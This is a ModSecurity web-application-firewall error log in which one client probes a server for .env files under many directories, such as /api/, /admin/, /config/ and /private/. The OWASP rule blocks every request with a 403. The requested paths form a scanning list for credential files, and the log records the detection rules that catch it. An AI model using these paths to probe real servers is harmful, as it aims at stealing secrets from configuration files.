[Mon May 11 18:03:06.936845 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/api/.env"] [unique_id "agH9ukWKUxpmnkK7zHyhiwAAAQQ"]
[Mon May 11 18:03:06.937070 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/api/.env"] [unique_id "agH9ukWKUxpmnkK7zHyhiwAAAQQ"]
[Mon May 11 18:03:06.937355 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9ukWKUxpmnkK7zHyhiwAAAQQ"]
[Mon May 11 18:03:07.113762 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/web/.env"] [unique_id "agH9u0WKUxpmnkK7zHyhjAAAAQQ"]
[Mon May 11 18:03:07.113990 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/web/.env"] [unique_id "agH9u0WKUxpmnkK7zHyhjAAAAQQ"]
[Mon May 11 18:03:07.114259 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9u0WKUxpmnkK7zHyhjAAAAQQ"]
[Mon May 11 18:03:07.303459 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/site/.env"] [unique_id "agH9u0WKUxpmnkK7zHyhjQAAAQQ"]
[Mon May 11 18:03:07.303683 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/site/.env"] [unique_id "agH9u0WKUxpmnkK7zHyhjQAAAQQ"]
[Mon May 11 18:03:07.303962 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9u0WKUxpmnkK7zHyhjQAAAQQ"]
[Mon May 11 18:03:07.553871 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/public/.env"] [unique_id "agH9u0WKUxpmnkK7zHyhkAAAAQQ"]
[Mon May 11 18:03:07.554092 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/public/.env"] [unique_id "agH9u0WKUxpmnkK7zHyhkAAAAQQ"]
[Mon May 11 18:03:07.554396 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9u0WKUxpmnkK7zHyhkAAAAQQ"]
[Mon May 11 18:03:07.746174 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/admin/.env"] [unique_id "agH9u0WKUxpmnkK7zHyhkQAAAQQ"]
[Mon May 11 18:03:07.746396 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/admin/.env"] [unique_id "agH9u0WKUxpmnkK7zHyhkQAAAQQ"]
[Mon May 11 18:03:07.746685 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9u0WKUxpmnkK7zHyhkQAAAQQ"]
[Mon May 11 18:03:07.901215 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/backend/.env"] [unique_id "agH9u0WKUxpmnkK7zHyhkgAAAQQ"]
[Mon May 11 18:03:07.901438 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/backend/.env"] [unique_id "agH9u0WKUxpmnkK7zHyhkgAAAQQ"]
[Mon May 11 18:03:07.901805 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9u0WKUxpmnkK7zHyhkgAAAQQ"]
[Mon May 11 18:03:08.069527 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/server/.env"] [unique_id "agH9vEWKUxpmnkK7zHyhkwAAAQQ"]
[Mon May 11 18:03:08.069759 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/server/.env"] [unique_id "agH9vEWKUxpmnkK7zHyhkwAAAQQ"]
[Mon May 11 18:03:08.070110 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9vEWKUxpmnkK7zHyhkwAAAQQ"]
[Mon May 11 18:03:08.259792 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/frontend/.env"] [unique_id "agH9vEWKUxpmnkK7zHyhlQAAAQQ"]
[Mon May 11 18:03:08.260026 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/frontend/.env"] [unique_id "agH9vEWKUxpmnkK7zHyhlQAAAQQ"]
[Mon May 11 18:03:08.260351 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9vEWKUxpmnkK7zHyhlQAAAQQ"]
[Mon May 11 18:03:08.423927 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/src/.env"] [unique_id "agH9vEWKUxpmnkK7zHyhlgAAAQQ"]
[Mon May 11 18:03:08.424149 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/src/.env"] [unique_id "agH9vEWKUxpmnkK7zHyhlgAAAQQ"]
[Mon May 11 18:03:08.424453 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9vEWKUxpmnkK7zHyhlgAAAQQ"]
[Mon May 11 18:03:08.607601 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/core/.env"] [unique_id "agH9vEWKUxpmnkK7zHyhlwAAAQQ"]
[Mon May 11 18:03:08.607828 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/core/.env"] [unique_id "agH9vEWKUxpmnkK7zHyhlwAAAQQ"]
[Mon May 11 18:03:08.635705 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9vEWKUxpmnkK7zHyhlwAAAQQ"]
[Mon May 11 18:03:08.961820 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/core/app/.env"] [unique_id "agH9vEWKUxpmnkK7zHyhmAAAAQQ"]
[Mon May 11 18:03:08.962112 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/core/app/.env"] [unique_id "agH9vEWKUxpmnkK7zHyhmAAAAQQ"]
[Mon May 11 18:03:08.962404 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9vEWKUxpmnkK7zHyhmAAAAQQ"]
[Mon May 11 18:03:09.121887 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/config/.env"] [unique_id "agH9vUWKUxpmnkK7zHyhmwAAAQQ"]
[Mon May 11 18:03:09.122123 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/config/.env"] [unique_id "agH9vUWKUxpmnkK7zHyhmwAAAQQ"]
[Mon May 11 18:03:09.122432 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9vUWKUxpmnkK7zHyhmwAAAQQ"]
[Mon May 11 18:03:09.283453 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /private/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/private/.env"] [unique_id "agH9vUWKUxpmnkK7zHyhnAAAAQQ"]
[Mon May 11 18:03:09.283682 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/private/.env"] [unique_id "agH9vUWKUxpmnkK7zHyhnAAAAQQ"]
[Mon May 11 18:03:09.283981 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9vUWKUxpmnkK7zHyhnAAAAQQ"]
[Mon May 11 18:03:09.527027 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/application/.env"] [unique_id "agH9vUWKUxpmnkK7zHyhnQAAAQQ"]
